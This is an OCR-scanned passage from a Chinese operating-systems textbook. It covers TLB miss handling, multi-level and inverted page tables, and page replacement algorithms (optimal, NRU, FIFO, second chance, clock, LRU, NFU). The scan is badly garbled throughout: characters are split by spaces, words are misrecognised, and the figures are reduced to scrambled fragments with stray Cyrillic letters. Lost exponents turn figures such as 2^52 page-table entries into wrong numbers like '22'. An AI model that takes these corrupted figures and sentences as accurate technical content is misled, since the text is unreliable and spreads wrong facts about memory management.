无 论 是 用 硬件 还 是 用 软件 来 处 理 TLB 失 效 ， 常见 方法 都 是 找到 页 表 并 执行 索引 操作 以 定位 将 要 访问 
的 页 面 。 用 软件 做 这 样 的 搜索 的 问题 是 ， 页 表 可 能 不 在 TLB 中 ， 这 就 会 导致 处 理 过 程 中 的 额外 的 TLB 失 
效 。 可 以 通过 在 内 存 中 的 固定 位 置 维护 一 个 大 的 (如 4KB) TLB 表 项 的 软件 高 速 缓存 (该 高 速 缓存 的 页 
面 总 是 被 保存 在 TLB 中 ) 来 减少 TLB 失 效 。 通过 首先 检查 软件 高 速 缓存 ， 操 作 系统 能 够 实质 性 地 减少 
TLB 失 效 。 

当 使 用 软件 TLB 管 理 时 ， 一 个 基本 要 求 是 要 理解 两 种 不 同 的 TLB 失 效 的 区 别 在 哪里 。 当 一 个 页 面 访 
间 在 内 存 中 而 不 在 TLB 中 时 ， 将 产生 软 失 效 (soft miss), 那么 此 时 所 要 做 的 就 是 更 新 一 下 TLB， 不 需要 
产生 磁盘 IO。 典型 的 处 理 需要 10~20 个 机 器 指令 并 花费 几 个 纳 秒 完成 操作 。 相 反 ， 当 页 面 本 身 不 在 内 存 
中 (当然 也 不 在 TLB 中 ) 时 ， 将 产生 硬 失 效 。 此 刻 需要 一 次 磁盘 存 取 以 装 入 该 页 面 ， 这 个 过 程 大 概 需要 
几 毫 秒 。 硬 失效 的 处 理 时 间 往 往 是 软 失效 的 百 万 倍 。 


334 针对 大 内 存 的 页 表 

在 原 有 的 内 存 页 表 的 方案 之 上 ， 引 入 快 表 (TLB) 可 以 用 来 加 快 虚 扫地 址 到 物理 地 址 的 转换 。 不 过 
这 不 是 惟一 需要 解决 的 问题 ， 另 一 个 问题 是 怎样 处 理 巨大 的 虚拟 地 址 空间 。 下 面 将 讨论 两 种 解决 方法 。 

1. 多 级 页 表 

第 一 种 方法 是 采用 多 级 页 胡 。 一 个 简单 的 例子 如 图 3-13 所 示 。 在 图 3-13a 中 ，32 位 的 虚拟 地 址 被 划 
分 为 10 位 的 PT1 域 、10 位 的 PT2 域 和 12 位 的 Offset ( 偏 移 量 ) 域 。 因 为 偏 移 量 是 12 位 ， 所 以 页 面 长 度 是 
4KB， 共 有 2” 个 页 面 。 

引入 多 级 页 表 的 原因 是 避免 把 全 部 页 表 一 直 保存 在 内 存 中 。 特 别 是 那些 从 不 需要 的 页 表 就 不 应 该 保 
留 。 比 如 一 个 需要 12MB 内 存 的 进程 ， 其 最 底 端 是 4MB 的 程序 正文 段 ， 后 面 是 4MB 的 数据 段 ， 顶 端 是 
4MB 的 堆栈 段 ， 在 数据 段 上 方 和 堆栈 段 下 方 之 间 是 大 量 根本 没有 使 用 的 空闲 区 。 

考察 图 3-13b 例 子 中 的 二 级 页 表 是 如 何 工作 的 。 在 左边 是 顶级 页 表 ， 它 具有 1024 个 表 项 ， 对 应 于 10 
位 的 PT1 域 。 当 一 个 虚拟 地 址 被 送 到 MMU 时 ， MMU 首 先 提取 PT1 域 并 把 该 值 作为 访问 顶级 页 表 的 索引 。 
因为 整个 4GB (32 位 ) 虚拟 地 址 空间 已 经 被 分 成 1024 个 4MB 的 块 ， 所 以 这 1024 个 表 项 中 的 每 一 个 都 表示 
4MB 的 虚拟 地 址 空间 。 
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二 级 页 表 


| 内 存 顶 部 
;4MB 的 页 表 


| 


顶级 页 表 


至 页 面 


b) 
图 3-13 а) 一 个 有 两 个 页 表 域 的 32 位 地 位 ，b) 二 级 页 表 


由 索引 顶级 页 表 得 到 的 表 项 中 含有 二 级 页 表 的 地 址 或 页 框 号 。 项 级 页 表 的 表 项 0 指向 程序 正文 的 页 
表 ， 表 项 1 指向 数据 的 页 表 ， 表 项 1023 指 向 堆栈 的 页 表 ， 其 他 的 表 项 (用 阴影 表示 的 ) 未 用 。 现 在 把 PT2 
域 作为 访问 选 定 的 二 级 页 表 的 索引 ， 以 便 找到 该 虚拟 页 面 的 对 应 页 框 号 。 

下 面 看 一 个 示例 ， 考 虑 32 位 虚拟 地 址 0x00403004 (十 进 制 4 206 596) 位 于 数据 部 分 12 292 字 节 处 。 
它 的 虚拟 地 址 对 应 PT1 = 1，PT2=2，Offset=4。MMU 首 先 用 PT1 作 为 索引 访问 顶级 页 表 得 到 表 项 1， 它 
对 应 的 地 址 范围 是 4M~8M。 然 后 ， 它 用 PT2 作 为 索引 访问 刚刚 找到 的 二 级 页 表 并 得 到 表 项 3， 它 对 应 的 
虚拟 地 址 范围 是 在 它 的 4M 块 内 的 12 288-16 383 ( 即 绝对 地 址 4 206 592-4 210 687)。 这 个 表 项 含有 虚拟 
地 址 0x00403004 所 在 页 面 的 页 框 号 。 如 果 该 页 面 不 在 内 存 中 ， 页 表 项 中 的 “在 /不 在 ”位 将 是 0， 引发 一 
次 缺 页 中 断 。 如 果 该 页 面 在 内 存 中 ， 从 二 级 页 表 中 得 到 的 页 框 号 将 与 偏 移 量 (4) 结合 形成 物理 地 址 。 
该 地 址 被 放 到 总 线 上 并 送 到 内 存 中 。 

值得 注意 的 是 ， 虽然 在 图 3-13 中 虚拟 地 址 空间 超过 100 万 个 页 面 ， 实 际 上 只 需要 四 个 页 表 ， 顶级 页 表 
以 及 0~4M (正文 段 )、4M~8M (数据 段 ) 和 顶端 4M (堆栈 段 ) 的 二 级 页 表 。 顶 级 页 表 中 1021 个 表 项 的 
“在 /不 在 ”位 都 被 设 为 0， 当 访问 它们 时 强制 产生 一 个 缺 页 中 断 。 如 果 发 生 了 这 种 情况 ， 操 作 系统 将 注意 
到 进程 正在 试图 访问 一 个 不 希望 被 访问 的 地 址 ， 并 采取 适当 的 行动 ， 比 如 向 进程 发 出 一 个 信号 或 杀 死 进程 
等 。 在 这 个 例子 中 的 各 种 长 度 选择 的 都 是 整数 ， 并 且 选 择 PT1 与 PT2 等 长 ， 但 在 实际 中 也 可 能 是 其 他 的 值 。 

图 3-13 所 示 的 二 级 页 表 可 扩充 为 三 级 、 四 级 或 更 多 级 。 级 别 越 多 ， 灵 活性 就 越 大 ， 但 页 表 超 过 三 级 
会 带 来 更 大 的 复杂 性 ， 这 样 做 是 否 值得 令 人 怀疑 。 

2. 倒 排 页 表 

对 32 位 虚拟 地 址 空间 ， 多 级 页 表 可 以 很 好 地 发 挥 作用 。 但 是 ， 随 着 64 位 计算 机 变 得 更 加 普遍 ， 情 况 
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发 生 了 彻底 的 变化 。 如 果 现在 的 地 址 空间 是 2” 字 节 , 页 面 大 小 为 4KB, 我 们 需要 一 个 有 22 个 表 项 的 页 表 。 
如 果 每 一 个 表 项 8 个 字 节 ， 那 么 整个 页 表 就 会 超过 3000 万 GB (30PB)。 仅 仅 为 页 表 耗 费 3000 万 GB 不 是 个 
好 主意 (现在 不 是 ， 可 能 以 后 几 年 也 不 是 )。 因 而 ,具有 64 位 分 页 虚拟 地 址 空间 的 系统 需要 一 个 不 同 的 
解决 方案 。 

解决 方案 之 一 就 是 使 用 鲁 排 页 表 (inverted page table) 。 在 这 种 设计 中 ， 在 实际 内 存 中 每 一 个 页 框 
有 一 个 表 项 ， 而 不 是 每 一 个 虚拟 页 面 有 一 个 表 项 。 例 如 ， 对 于 64 位 虚拟 地 址 ，4KB 的 页 ，1GB 的 RAM， 
一 个 倒 排 页 表 仅 需 要 262 144 个 页 表 项 。 表 项 记录 哪 一 个 (进程 ， 虚 拟 页 面 ) 对 定位 于 该 页 框 。 

虽然 倒 排 页 表 节 省 了 大 量 的 空间 (至 少 当 虚 拟 地 址 空间 比 物理 内 存 大 得 多 的 时 候 是 这 样 的 )， 但 它 
也 有 严重 的 不 足 ， 从 虚拟 地 址 到 物理 地 址 的 转换 会 变 得 很 困难 。 当 进程 n 访 问 虚拟 页 面 p 时 ， 硬 件 不 再 能 
通过 把 p 当 作 指 向 页 表 的 一 个 索引 来 查找 物理 页 框 。 取 而 代 之 的 是 ， 它 必须 搜索 整个 倒 排 页 表 来 查找 某 
一 个 表 项 (n，p)。 此 外 ， 该 搜索 必须 对 每 一 个 内 存 访问 操作 都 要 执行 一 次 ， 而 不 仅仅 是 在 发 生 缺 页 中 
断 时 执行 。 每 一 次 内 存 访问 操作 都 要 查找 一 个 256K 的 表 是 不 会 让 你 的 机 器 运行 得 很 快 的 。 

走出 这 种 两 难 局 面 的 办 法 是 使 用 TLB。 如 果 TLB 能 够 记录 所 有 频繁 使 用 的 页 面 ， 地 址 转换 就 可 能 变 
得 像 通常 的 页 表 一 样 快 。 但 是 ， 当 发 生 TLB 失 效 时 ， 需 要 用 软件 搜索 整个 倒 排 页 表 。 一 个 可 行 的 实现 该 
搜索 的 方法 是 建立 一 张 散 列表 ， 用 虚拟 地 址 来 散 列 。 当 前 所 有 在 内 存 中 的 具有 相同 散 列 值 的 虚拟 页 面 被 
链接 在 一 起 ， 如 图 3-14 所 示 。 如 果 散 列表 中 的 槽 数 与 机 器 中 物理 页 面 数 一 样 多 ， 那 么 散 列表 的 冲突 链 的 
平均 长 度 将 会 是 1 个 表 项 ， 这 将 会 大 大 提高 映射 速度 。 一 旦 页 框 号 被 找到 ， 新 的 〈 虚 拟 页 号 ， 物 理 页 杠 
号 ) 对 就 会 被 装载 到 TLB 中 。 


传统 页 表 ， 每 页 一 个 
页 表 项 ， 共 2 个 页 面 
1GB 物 理 内 存 有 
2 个 4KB 页 检 散 列 表 
2 КУ 一 一 
== =Æ m 
of | 0 Аі 
以 虚拟 页 面 зеня A 
作为 索引 计算 , 并 作为 来 引 EO ШК 


图 3-14 传统 页 表 与 倒 排 页 表 的 对 比 


倒 排 页 表 在 64 位 机 器 中 很 常见 , 因为 在 64 位 机 器 中 即使 使 用 了 大 页 面 , 页 表 项 的 数量 还 是 很 庞大 的 。 
例如 ， 对 于 4MB 页 面 和 64 位 虚拟 地 址 ， 需 要 22 个 页 表 项 。 处 理 大 虚 存 的 其 他 方法 可 参见 Talluri 等 人 的 论 
Ж (1995), 


3.4 页 面 置换 算法 

当 发 生 缺 页 中 断 时 ， 操 作 系统 必须 在 内 存 中 选择 一 个 页 面 将 其 换 出 内 存 ， 以 便 为 即将 调和 的 页 面 腾 
出 空间 。 如 果 要 换 出 的 页 面 在 内 存 驻 留 期 间 已 经 被 修改 过 ， 就 必须 把 它 写 回 磁盘 以 更 新 该 页 面 在 磁盘 上 
的 副本 ， 如 果 该 页 面 没 有 被 修改 过 (如 一 个 包含 程序 正文 的 页 面 )， 那 么 它 在 磁盘 上 的 副本 已 经 是 最 新 
的 ， 不 需要 回 写 。 直 接 用 调和 的 页 面 覆 盖 掉 被 询 汰 的 页 面 就 可 以 了 。 

当 发 生 缺 页 中 断 时 ， 虽 然 可 以 随机 地 选择 一 个 页 面 来 置换 ， 但 是 如 果 每 次 都 选择 不 常 使 用 的 页 面 会 
提升 系统 的 性 能 。 如 果 一 个 被 频繁 使 用 的 页 面 被 置换 出 内 存 ， 很 可 能 它 在 很 短 时 间 内 又 要 被 调和 内存， 
这 会 带 来 不 必要 的 开销 。 人 们 已 经 从 理论 和 实践 两 个 方面 对 页 面 置换 算法 进行 了 深入 的 研究 。 下 面 我 们 
将 介绍 几 个 最 重要 的 算法 。 

有 必要 指出 ,“ 页 面 置换 ”问题 在 计算 机 设计 的 其 他 领域 中 也 会 同样 发 生 。 例 如 ， 多 数 计算 机 把 最 
近 使 用 过 的 32 字 节 或 64 字 节 的 存储 块 保存 在 一 个 或 多 个 高 速 缓存 中 。 当 这 些 高 速 缓存 存 满 之 后 就 必须 先 
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择 一 些 块 丢 掉 。 除 了 花费 时 间 较 短 外 (有关 操作 必须 在 若干 纳 秒 中 完成 ， 而 不 是 像 页 面 置 换 那 样 在 微 秒 
级 上 完成 )， 这 个 问题 同 页 面 置换 问题 完全 一 样 。 之 所 以 花费 时 间 较 短 ， 共 原因 是 丢掉 的 高 速 缓存 块 可 
以 从 内 存 中 获得 ， 而 内 存 既 没有 寻 道 时 间 也 不 存在 旋转 延迟 。 

第 二 个 例子 是 Web 服 务 器 。 服 务 器 可 以 把 一 定数 量 的 经 常 访问 的 Web 页 面 存放 在 存储 器 的 高 速 缓存 
中 。 但 是 ， 当 存储 器 高 速 缓存 已 满 并 且 要 访问 一 个 不 在 高 速 缓存 中 的 页 面 时 ， 就 必须 要 置换 高 速 缓 在 中 
的 某 个 web 页面 。 由 于 在 高 速 缓存 中 的 Web 页 面 不 会 被 修改 ， 因 此 在 磁盘 中 的 Web 页 面 的 副本 总 是 最 新 
的 。 而 在 虚拟 存储 系统 中 ， 内 存 中 的 页 面 既 可 能 是 干净 页 面 也 可 能 是 肚 页 面 。 除 此 之 外 ， 置 换 Web 页 面 
和 置换 虚拟 内 存 中 的 页 面 需要 考虑 的 问题 是 类 似 的 。 

在 接 下 来 讨论 的 所 有 页 面 置换 算法 中 都 存在 一 个 问题 ， 当 需要 从 内 存 中 换 出 某 个 页 面 时 ， 它 是 否 只 
能 是 缺 页 进程 本 身 的 页 面 ? 这 个 要 换 出 的 页 面 是 否 可 以 属于 另外 一 个 进程 ? 在 前 一 种 情况 下 ， 可 以 有 效 
地 将 每 一 个 进程 限定 在 固定 的 页 面 数 目 内 ， 后 一 种 情况 则 不 能 。 这 两 种 情况 都 是 可 能 的 。 在 3.5.1 节 我 们 
会 继续 讨论 这 一 点 。 


341 最 优 页 面 置换 算法 

很 容易 就 可 以 描述 出 最 好 的 页 面 置换 算法 ， 虽 然 此 算法 不 可 能 实现 。 该 算法 是 这 样 工作 的 :在 缺 页 
中 断 发 生 时 ， 有 些 页 面 在 内 存 中 ， 其 中 有 一 个 页 面 (包含 紧 接着 的 下 一 条 指令 的 那个 页 面 ) 将 很 快 被 访 
间 ， 其 他 页 面 则 可 能 要 到 10、100 或 1000 条 指令 后 才 会 被 访问 ， 每 个 页 面 都 可 以 用 在 该 页 面 首次 被 访问 
前 所 要 执行 的 指令 数 作为 标记 。 

最 优 页 面 置换 算法 规定 应 该 置换 标记 最 大 的 页 面 。 如 果 一 个 页 面 在 800 万 条 指令 内 不 会 被 使 用 ， 另 
外 一 个 页 面 在 600 万 条 指令 内 不 会 被 使 用 ， 则 置换 前 一 个 页 面 ， 从 而 把 因 需 要 调和 这 个 页 面 而 发 生 的 缺 
页 中 断 推迟 到 将 来 ， 越 久 越 好 。 计 算 机 也 像 人 一 样 ， 希 望 把 不 愉快 的 事情 尽 可 能 地 往 后 拖延 。 

这 个 算法 惟一 的 问题 就 是 它 是 无 法 实现 的 。 当 缺 页 中 断 发 生 时 ， 操 作 系统 无 法 知道 各 个 页 面 下 一 次 
将 在 什么 时 候 被 访问 。( 在 最 短 作业 优先 调度 算法 中 ， 我 们 曾 遇 到 同样 的 情况 ， 即 系统 如 何 知道 哪个 作 
业 是 最 短 的 呢 ? ) 当然 ， 通 过 首先 在 仿真 程序 上 运行 程序 ， 跟 踪 所 有 页 面 的 访问 情况 ， 在 第 二 次 运行 时 
利用 第 一 次 运行 时 收集 的 信息 是 可 以 实现 最 优 页 面 置换 算法 的 。 

用 这 种 方式 ， 我 们 可 以 通过 最 优 页 面 置换 算法 对 其 他 可 实现 算法 的 性 能 进行 比较 。 如 果 操作 系统 达 
到 的 页 面 置换 性 能 只 比 最 优 算法 差 1%， 那 么 即使 花费 大 量 的 精力 来 寻找 更 好 的 算法 最 多 也 只 能 换 来 1% 
的 性 能 提高 。 

为 了 避免 混 清 ， 读 者 必须 清楚 以 上 页 面 访问 情况 的 记录 只 针对 刚刚 被 测试 过 的 程序 和 它 的 一 个 特定 
的 输入 ， 因 此 从 中 导出 的 性 能 最 好 的 页 面 置换 算法 也 只 是 针对 这 个 特定 的 程序 和 输入 数据 的 。 虽 然 这 个 
方法 对 评价 页 面 置换 算法 很 有 用 ， 但 它 在 实际 系统 中 却 不 能 使 用 。 下 面 我 们 将 研究 可 以 在 实际 系统 中 使 
用 的 算法 。 


3.4.2 最 近 未 使 用 页 面 置 换算 法 

为 使 操作 系统 能 够 收集 有 用 的 统计 信息 ， 在 大 部 分 具有 虚拟 内 存 的 计算 机 中 ， 系 统 为 每 一 页 面 设置 
了 两 个 状态 位 。 当 页 面 被 访问 ( 读 或 写 ) 时 设置 R 位 ， 当 页 面 ( 即 修改 页 面 ) 被 写 人 时 设置 M 位 。 这 些 
位 包含 在 页 表 项 中 ， 如 图 3-11 所 示 。 每 次 访问 内 存 时 更 新 这 些 位 ， 因 此 由 硬件 来 设置 它们 是 必要 的 。 一 
且 设 置 某 位 为 1， 它 就 一 直 保持 1 直到 操作 系统 将 它 复位 。 

如 果 硬 件 没有 这 些 位 ， 则 可 以 进行 以 下 的 软件 模拟 : 当 启动 一 个 进程 时 ， 将 其 所 有 的 页 面 都 标记 为 
KERF: 一 旦 访问 任何 一 个 页 面 就 会 引发 一 次 缺 页 中 断 ， 此 时 操作 系统 就 可 以 设置 R 位 (在 它 的 内 部 
表格 中 )， 修 改 页 表 项 使 其 指向 正确 的 页 面 ， 并 设 为 READ ONLY 模 式 ， 然 后 重新 启动 引起 缺 页 中 断 的 指 
令 ， 如果 随 后 对 该 页 面 的 修改 又 引发 一 次 缺 页 中 断 ， 则 操作 系统 设置 这 个 页 面 的 M 位 并 将 其 改 为 
READ/WRITE 模 式 。 

可 以 用 R 位 和 M 位 来 构造 一 个 简单 的 页 面 置换 算法 ， 当 启动 一 个 进程 时 ， 它 的 所 有 页 面 的 两 个 位 都 
由 操作 系统 设置 成 0%，R 位 被 定期 地 (比如 在 每 次 时 钟 中 断 时 ) 清 零 ， 以 区 别 最 近 没 有 被 访问 的 页 面 和 被 
访问 的 页 面 。 

当 发 生 缺 页 中 断 时 ， 操 作 系统 检查 所 有 的 页 面 并 根据 它们 当前 的 R 位 和 M 位 的 值 ， 把 它们 分 为 4 类 : 
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第 0 类 : 没有 被 访问 ， 没 有 被 修改 。 

第 1 类 : 没有 被 访问 ， 已 被 修改 。 

第 2 类 : 已 被 访问 ， 没 有 被 修改 。 

第 3 类 : 已 被 访问 ， 已 被 修改 。 
尽管 第 1 类 初 看 起 来 似乎 是 不 可 能 的 ， 但 是 一 个 第 3 类 的 页 面 在 它 的 R 位 被 时 钟 中 断 清 零 后 就 成 了 第 1 类 。 
时 钟 中 断 不 清除 M 位 是 因为 在 决定 一 个 页 面 是 否 需要 写 回 磁盘 时 将 用 到 这 个 信息 。 清 除 R 位 而 不 清除 M 
位 产生 了 第 1 类 页 面 。 

NRU (Not Recently Used， 最 近 未 使 用 ) 算法 随机 地 从 类 编号 最 小 的 非 空 类 中 挑选 一 个 页 面 淘汰 之 。 
这 个 算法 隐 含 的 意思 是 ， 在 最 近 一 个 时 钟 滴答 中 (典型 的 时 间 是 大 约 20ms) 淘汰 一 个 没有 被 访问 的 已 修 
改 页 面 要 比 淘汰 一 个 被 频繁 使 用 的 “干净 ”页 面 好 。NRU 主 要 优点 是 易于 理解 和 能 够 有 效 地 被 实现 ， 虽 
然 它 的 性 能 不 是 最 好 的 ， 但 是 已 经 够 用 了 。 
3.4.3 先进 先 出 页 面 置换 算法 

另 一 种 开销 较 小 的 页 面 置换 算法 是 FIFO (First-In FirsrOut， 先 进 移出 ) 算法 。 为 了 解释 它 是 怎样 
工作 的 ， 我 们 设想 有 一 个 超级 市 场 ， 它 有 足够 的 货架 能 展示 种 不 同 的 商品 。 有 一 天 ， 某 家 公司 介绍 了 
-种 新 的 方便 食品 一 一 即食 的 、 冷 并 干燥 的 、 可 以 用 微波 炉 加 热 的 酸 乳 酷 ， 这 个 产品 非常 成 功 ， 所 以 容 
量 有 限 的 超市 必须 撤 掉 一 种 旧 的 商品 以 便 能 够 展示 该 新 产品 。 

一 种 可 能 的 解决 方法 就 是 找到 该 超级 市 场 中 库存 时 间 最 长 的 商品 并 将 其 替换 掉 (比如 某 种 120 年 以 
前 就 开始 卖 的 商品 ) ， 理 由 是 现在 已 经 没有 人 喜欢 它 了 。 这 实际 上 相当 于 超级 市 场 有 一 个 按照 引进 时 间 
排列 的 所 有 商品 的 链表 。 新 的 商品 被 加 到 链表 的 尾部 ， 链 表 头 上 的 商品 则 被 搬 掉 。 “ 

同样 的 思想 也 可 以 应 用 在 页 面 置换 算法 中 。 由 操作 系统 维护 一 个 所 有 当前 在 内 存 中 的 页 面 的 链表 ， 
最 新 进入 的 页 面 放 在 表 尾 ， 最 久 进入 的 页 面 放 在 表 头 。 当 发 生 缺 页 中 断 时 ， 淘汰 表 头 的 页 面 并 把 新 调 入 
的 页 面 加 到 表 尾 。 当 FIFO 用 在 超级 市 场 时 ， 可 能 会 淘汰 制 须 畜 ， 但 也 可 能 淘汰 面粉、 盐 或 黄油 这 一 类 常 
用 商品 。 因 此 ， 当 它 应 用 在 计算 机 上 时 也 会 引起 同样 的 问题 ， 由 于 这 一 原因 ， 很 少 使 用 纯粹 的 FIFO 算 法 。 
3.4.4 第 二 次 机 会 页 面 置 换算 法 

FIFO 算 法 可 能 会 把 经 常 使 用 的 页 面 置换 出 去 ， 为 了 避免 这 一 问题 ， 对 该 算法 做 一 个 简单 的 修改 ; 
检查 最 老 页 面 的 R 位 。 如 果 R 位 是 9， 那么 这 жыш, 


个 页 面 上 老 双 没 有 被 使 用 ， 可 以 立刻 置换 HA чү MEMA 

掉 ， 如 果 是 1， 就 将 R 位 清 0， 并 把 该 页 面 放 2 12 5] п е. 的 页 面 

到 链表 的 尾 端 ， 修 改 它 的 装 入 时 间 使 它 就 像 HeHeHeH HHH” 

刚 装 入 的 一 样 ， 然 后 继续 搜索 。 " РА 
这 一 算法 称 为 第 二 次 机 会 (second з 7 8 12 14 15 18 2 ， 是 最 新 装 

chance) 算法 ， 如 图 3-15 所 示 。 在 图 3-15a 中 +) A]” 入 的 页 面 


我 们 看 到 页 面 A 到 页 面 H 
间 顺 序 保存 在 链表 中 。 
假设 在 时 间 20 发 生 了 一 次 缺 页 中 断 ， 这 3-15 第 二 次 机 会 算法 的 操作 (页 面 上 面 的 数字 是 装 人 
时 最 老 的 页 面 是 A， 它 是 在 时 刻 0 到 达 的 。 ”时 间 ): а) 按 先进 先 出 的 方法 排列 的 页 面 ， b) 在 时 间 20 发 
如 果 A 的 R 位 是 0， 则 将 它 淘汰 出 内 存 ， 或 者 生 缺 页 中 断 并 且 A 的 R 位 已 经 设置 时 的 页 面 链表 
把 它 写 回 磁盘 (如果 它 已 被 修改 过 )， 或 者 
只 是 简单 地 放弃 (如果 它 是 “干净 ”的 ) ， 另 一 方面 ， 如 果 其 R 位 已 经 设置 了 ， 则 将 A 放 到 链表 的 尾部 
并 且 重 新 设置 “ 装 人 时 间 ” 为 当前 时 刻 (20)， 然 后 清除 R 位 。 然后 从 B 页 面 开 始 继续 搜索 合适 的 页 面 。 
第 二 次 机 会 算法 就 是 寻找 一 个 最 近 的 时 钟 间隔 以 来 没有 被 访问 过 的 页 面 。 如 果 所 有 的 页 面 都 被 访问 
过 了 ， 该 算法 就 简化 为 纯粹 的 FIFO 算 法 。 特 别 地 ， 想 象 一 下 ， 假设 图 3-15a 中 所 有 的 页 面 的 R 位 都 被 设置 
了 ， 操 作 系统 将 会 一 个 接 -个 地 把 每 个 页 面 都 移动 到 链表 的 尾部 并 清除 被 移动 的 页 面 的 R 位 。 最 后 算法 
又 将 回 到 页 面 A， 此 时 它 的 R 位 已 经 被 清除 了 ， 因此 A 页 面 将 被 淘汰 ， 所 以 这 个 算法 总 是 可 以 结束 的 。 


照 进 入 内 存 的 时 b) 
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3.4.5 时 钟 页 面 置 换算 法 
尽管 第 二 次 机 会 算法 是 一 个 比较 合理 的 算法 ， 但 它 经 常 要 在 链表 中 移动 页 面 ， 既 降低 了 效率 又 不 是 
很 有 必要 。 一 个 更 好 的 办 法 是 把 所 有 的 页 面 都 


保存 在 一 个 类 似 钟 面 的 环形 链表 中 ， 一 个 表 针 Ы Б 
指向 最 老 的 页 面 ， 如 图 3-16 所 示 。 

当 发 生 缺 页 中 断 时 ， 算 法 首先 检查 表 针 指 K] с] чалат, е 
向 的 页 面 ， 如 果 它 的 R 位 是 0 就 淘汰 该 页 面 ， 并 y 查 表 针 指向 的 页 面 。 根 


[5] 据 R 位 采取 动作 ， 
: 淘汰 页 面 


把 新 的 页 面 插入 这 个 位 置 ， 然 后 把 表 针 前 移 一 Ы 
个 位 置 ， 如 果 R 位 是 1 就 清除 R 位 并 把 表 针 前 移 


: 清除 R 位 并 向 前 
一 个 位 置 ， 重 复 这 个 过 程 直到 找到 了 一 个 R 位 L E жир o 
为 0 的 页 面 为 止 。 了 解 了 这 个 算法 的 工作 方式 ， Е 
就 明白 为 什么 它 被 称 为 时 钟 (clock) WAT. в 
346 最 近 最 少 使 用 页 面 置换 算法 图 3-16 时 名 页面 置换 算法 


对 最 优 算法 的 一 个 很 好 的 近似 是 基于 这 样 
的 观察 : 在 前 面 几 条 指令 中 频繁 使 用 的 页 面 很 可 能 在 后 面 的 几 条 指令 中 被 使 用 。 反 过 来 说 ， 已 经 很 久 没 
有 使 用 的 页 面 很 有 可 能 在 未 来 较 长 的 一 段 时 间 内 仍然 不 会 被 使 用 。 这 个 思想 提示 了 一 个 可 实现 的 算法 ， 
在 缺 页 中 断 发 生 时 ， 置 换 未 使 用 时 间 最 长 的 页 面 。 这 个 策略 称 为 LRU (Least Recently Used， 最 近 最 少 
使 用 ) 页 面 置换 算法 。 

虽然 LRU 在 理论 上 是 可 以 实现 的 ， 但 代价 很 高 。 为 了 完全 实现 LRU， 需 要 在 内 存 中 维护 一 个 所 有 页 
面 的 链表 ， 最 近 最 多 使 用 的 页 面 在 表 头 ， 最 近 最 少 使 用 的 页 面 在 表 尾 。 困 难 的 是 在 每 次 访问 内 存 时 都 必 
须要 更 新 整个 链表 。 在 链表 中 找到 一 个 页 面 ， 删 除 它 ， 然 后 把 它 移动 到 表 头 是 一 个 非常 费时 的 操作 ， 即 
使 使 用 硬件 实现 也 一 样 费 时 (假设 有 这 样 的 硬件 )。 

然而 ， 还 是 有 一 些 使 用 特殊 硬件 实现 LRU 的 方法 。 我 们 先 考虑 一 个 最 简单 的 方法 。 这 个 方法 要 求 硬 
件 有 一 个 64 位 计数 器 C， 它 在 每 条 指令 执行 完 后 自动 加 1， 每 个 页 表 项 必须 有 一 个 足够 容纳 这 个 计数 器 值 
的 域 。 在 每 次 访问 内 存 后 ， 将 当前 的 C 值 保存 到 被 访问 页 面 的 页 表 项 中 。 一 旦 发 生 缺 页 中 断 ， 操 作 系统 
就 检查 所 有 页 表 项 中 计数 器 的 值 ， 找 到 值 最 小 的 一 个 页 面 ， 这 个 页 面 就 是 最 近 最 少 使 用 的 页 面 。 

现在 让 我 们 看 一 看 第 二 个 硬件 实现 的 LRU 算 法 。 在 一 个 有 "个 页 框 的 机 器 中 ，LRU 硬 件 可 以 维持 一 
个 初 值 为 0 的 xn 位 的 矩阵 。 当 访问 到 页 框 4 十 ， 硬 件 首先 把 k 行 的 位 都 设置 成 1， 再 把 t 列 的 位 都 设置 成 0。 
在 任何 时 刻 ， 二 进 制 数值 最 小 的 行 就 是 最 近 最 少 使 用 的 ， 第 二 小 的 行 是 下 一 个 最 近 最 少 使 用 的 ， 以 此 类 
推 。 这 个 算法 的 工作 过 程 可 以 用 图 3-17 所 示 的 实例 说 明 ， 该 实例 中 有 4 个 页 框 ， 页 面 访问 次 序 为 : 

0123210323 

访问 页 面 0 后 的 状态 如 图 3-17a 所 示 ， 访 问 页 1 后 的 状态 如 图 3-17b 所 示 ， 以 此 类 推 。 


页 面 页 面 页 面 页 面 页 面 
0123 0123 0123 0123 0123 
Ф РБ Бе | fofofofo] Б5р 
раоопиоооовооооаоопоояоаооо 
2] 55565) Gii] Gill] MiTo 
з] bitti biii] COC] 15 

a) b) б) d e) 
o[o[o[o] Б. °] [o eTe 
[| hi of [о]о[о]9 
iolol, | [lolol， 1| п 
"[о[о[о] [[ [ [о oj lo 

nD 8 ) 


图 3-17 使 用 矩阵 的 LRU， 页 面 以 0、1、2、3、2、1、0、3、2、3 次 序 访问 
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347 用 软件 模拟 LRU 

前 面 两 种 LRU 算 法 虽然 在 理论 上 都 是 可 以 实现 的 ， 但 只 有 非常 少 的 计算 机 拥有 这 种 硬件 。 因 此 ， 需 
要 一 个 能 用 软件 实现 的 解决 方案 。 一 种 可 能 的 方案 称 为 NFU (Not Frequently Used， 最 不 常用 ) 算法 。 
ї 一 个 软件 计数 器 相关 联 ， 计 数 器 的 初 值 为 0。 每 次 时 钟 中 断 时 ， 由 操作 系统 扫描 内 
存 中 所 有 的 页 面 ， 将 每 个 页 面 的 R 位 ( 它 的 值 是 0 或 1) 加 到 它 的 计数 器 上 。 这 个 计数 器 大 体 上 跟踪 了 各 
个 页 面 被 访问 的 频繁 程度 。 发 生 缺 页 中 断 时 ， 则 置换 计数 器 值 最 小 的 页 面 。 

NFU 的 主要 问题 是 它 从 来 不 忘记 任何 事情 。 比 如 ， 在 一 个 多 次 (扫描 ) 编译 器 中 ， 在 第 一 次 扫描 中 
被 频繁 使 用 的 页 面 在 程序 进入 第 二 次 扫描 时 ， 其 计数 器 的 值 可 能 仍然 很 高 。 实 际 上 ， 如 果 第 一 次 扫描 的 
执行 时 间 恰好 是 各 次 扫描 中 最 长 的 ， 含 有 以 后 各 次 扫描 代码 的 页 面 的 计数 器 可 能 总 是 比 含有 第 一 次 扫描 
代码 的 页 面 小 ， 结 果 是 操作 系统 将 置换 有 用 的 页 面 而 不 是 不 再 使 用 的 页 面 。 

幸运 的 是 只 需 对 NFU 做 一 个 小 小 的 修改 就 能 使 它 很 好 地 模拟 LRU。 其 修改 分 为 两 部 分 首先， 在 R 
位 被 加 进 之 前 先 将 计数 器 右 移 一 位 ， 其 次 ， 将 R 位 加 到 计数 器 最 左 端 的 位 而 不 是 最 右 端的 位 。 

